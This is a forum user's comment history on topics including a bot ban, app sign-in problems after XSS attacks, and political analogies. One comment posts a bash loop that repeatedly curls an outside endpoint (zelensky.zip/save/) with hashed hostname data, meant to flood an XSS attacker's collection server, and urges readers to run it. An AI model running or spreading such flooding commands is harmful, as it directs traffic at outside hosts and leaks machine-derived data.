There are no other users on lemmit.online, and the bot didn't post to any communities outside of lemmit.online. Defederating and banning the bot are functionally identical.
Gellis12
joined 1 year ago
BMW already did it
Neither do mosquitoes though
Sorry, I sneezed
Same here. I've noticed that even after doing that, I need to sign back in every time I reopen the app. I'm guessing it's something to do with the hotfix my insurance pushed out last night due to all the xss attacks, but don't know for sure.
Let me give you two hypothetical scenarios.
-
I go to a store, buy some stuff, forget to scan something at the self checkout machine, and leave without paying. When I get home, I realize that I didn't pay for something, so I go back to the store, apologize to the clerk, and pay for it.
-
I go to a store, intentionally hide some stuff in my coat, and leave without paying. When the store realizes that I'm trying to leave without paying. When they confront me, I deny it and accuse them of having "gellis12 derangement syndrome." When they call the cops on me, I refuse to cooperate with the cops. When the cops find the stolen goods on me, I refuse to give them back. When the cops forcibly take them back, I go online to rile up an angry mob and tell them that the stolen goods weren't actually stolen because I thought about paying for them and that should be good enough, before telling the angry mob to attack the cops.
Of these two purely hypothetical scenarios, which one sounds worse?
If Obama had stolen a bunch of top secret documents, bragged about sharing then with people who weren't allowed to see them, and subsequently been on trial for a bunch of pretty serious crimes, then yes.
Police officers posting for selfies with a criminal who's currently on trial is a bad look.
Oh weird, it wasn't returning anything a few minutes ago. I wonder if we pissed then off lol
It's essentially to add a unique salt to each machine that's doing this, otherwise they'd all be generating the same hash from identical timestamps. Afaik, sha hashes are still considered secure; and it's very unlikely they'd even try to crack one. But even if they did try and were successful, there isn't really anything nefarious they can do with your machines local name.
Here's a quick bash script if anyone wants to help flood the attackers with garbage data to hopefully slow them down: while true; do curl https://zelensky.zip/save/$(echo $(hostname) $(date) | shasum | sed 's/.\{3\}$//' | base64); sleep 1; done
Once every second, it grabs your computer name and the current system time, hashes them together to get a completely random string, trims off the shasum control characters and base64 encodes it to make everything look similar to what the attackers would be expecting, and sends it as a request to the same endpoint that their xss attack uses. It'll run on Linux and macOS (and windows if you have a WSL vm set up!) and uses next to nothing in terms of system resources.
The encoded strings are https://zelensky(dot)zip/save/ and navAdmin
42 wallaby way Sydney